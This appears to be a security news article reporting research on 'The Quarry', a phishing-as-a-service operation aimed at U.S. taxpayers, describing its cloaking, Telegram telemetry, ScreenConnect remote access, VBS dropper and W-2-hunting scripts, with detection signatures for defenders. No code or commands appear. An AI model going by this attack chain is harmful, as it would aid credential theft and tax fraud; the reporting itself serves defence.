Search TorWire

Find cybersecurity guides and research articles

Home > News > Cybersecurity > Researchers Uncover ‘The Quarry’ Phishing Network Used by Nearly 200 Criminal Affiliates

Researchers Uncover ‘The Quarry’ Phishing Network Used by Nearly 200 Criminal Affiliates

By: Jordan Vector Cybersecurity Expert

Last updated: June 16, 2026

Human Written
Researchers Uncover ‘The Quarry’ Phishing Network Used by Nearly 200 Criminal Affiliates
  • A single developer known as RockyBelling has assembled a full-service criminal toolkit that nearly 200 affiliates use worldwide to run IRS and SSA-themed phishing attacks against U.S. victims.

  • The operation combines advanced cloaking, real-time Telegram telemetry, and legitimate remote management software to steal credentials and maintain persistent access to compromised systems.

  • Security researchers tracked the ecosystem from April 2025 to April 2026, named it “The Quarry,” and urged defenders to hunt for its reusable technical signatures rather than treating each attack as isolated.

One developer. Nearly 200 criminal affiliates. A single threat actor known online as RockyBelling has built one of the most modular, commercially packaged phishing ecosystems targeting Americans today.

Security researchers spent a full year, from April 2025 to April 2026, mapping the operation, which they named “The Quarry.” It runs IRS- and Social Security Administration-themed phishing campaigns that predominantly hit U.S. victims.

One Developer, A Full Criminal Storefront

RockyBelling (also known as Rock, Rockky, and Mike) runs a Telegram channel called “Rocky War Room,” which had 194 subscribers at the time of analysis. The channel functions as a product catalog, announcement board, and support desk for his criminal services.

The toolkit includes phishing kits with built-in Adspect cloaking, a bulk email tool called Rocky Gmail Sender, credential harvesting panels, post-exploitation PowerShell scripts, and ScreenConnect remote management panels provisioned per affiliate.

Code and repository artifacts tied to his GitLab account, together with embedded Telegram bot tokens and matched infrastructure fingerprints, link everything back to one developer who actively maintains and updates the service, including an April 2026 release of a VBS dropper with a UAC bypass.

According to our security analysts, they identified over 40 distinct ScreenConnect panels and more than 80 campaign domains across the research window. The operation scales efficiently because affiliates handle distribution while RockyBelling handles the product.

How the Attack Gets In

The operation layers filtering techniques to block researchers and serve real victims. Initial checks screen out non-Windows user-agents and return benign pages to automated crawlers. Adspect, used here as a cloaking layer, fingerprints each visitor using WebGL data, timezone information, touch events, and other browser signals, serving the phishing page only to profiles matching a real, Windows-based user.

Bypass techniques are a common theme in cybercrime. A threat actor recently released an alleged Cloudflare Turnstile bypass code on a cybercrime forum — showing how criminals share evasion tools.

When victims land on the fake page, they see a realistic copy of an IRS site, Social Security page, or trusted SaaS platform. The page tricks users into downloading a “Security Connector,” presenting remote management software as a routine security update. Most victims install a ScreenConnect MSI or EXE silently, handing attackers full remote access.

Telegram handles real-time telemetry. Every victim download event, IP address, user-agent string, and timestamp flows directly into an affiliate’s Telegram bot. This mobile-first monitoring model lets operators triage victims and act fast without needing persistent desktop infrastructure.

In April 2026, RockyBelling introduced a VBS dropper that skips web delivery entirely. The obfuscated script requests admin access via a UAC prompt, downloads a fake PDF and a ScreenConnect installer from GitHub or GitLab, installs it silently, opens the decoy file to avoid suspicion, and then self-deletes to remove traces.

What Attackers Steal and How to Fight Back

Post-exploitation tooling targets U.S. tax fraud directly. PowerShell scripts extract six months of browser history and search recursively for W-2 files, sending results to Telegram. Logs from monitored bots also show AWS credentials and corporate secrets being harvested. Researchers say the evidence suggests Initial Access Broker activity and the possible sale of stolen access to ransomware groups.

Victims are overwhelmingly U.S.-based, though recorded infections have occurred in Egypt, Brazil, Germany, Japan, and Canada. Those non-U.S. cases likely include Americans working abroad, people with U.S. tax obligations, or users behind VPN services.

Defenders should focus on The Quarry’s reusable technical signatures, including Adspect stream_id reuse across domains, characteristic PHP filenames such as de.php and docs.php, Telegram bot tokens embedded in webserver code, and the ScreenConnect JARM fingerprint. Organizations should block known malicious domains, monitor connections to suspicious ScreenConnect panels, and enforce strict rules for email attachments and scripts.

According to experts, The Quarry proves how one well-supported criminal product can scale affiliate operations while evading traditional detection by blending legitimate remote management tools, effective cloaking, and mobile-first command and control. Defenders must treat these campaigns as a unified, service-driven threat, not isolated phishing incidents.

Share this article

About the Author

Jordan Vector

Jordan Vector

Cybersecurity Expert

Jordan is a security researcher and advocate who focuses on making privacy practical. Whether he's explaining how to harden a browser or reporting on the latest surveillance disclosures, his goal is to equip readers with knowledge they can use immediately. Jordan believes that true security begins with understanding the digital landscape.

Comments (0)

No comments.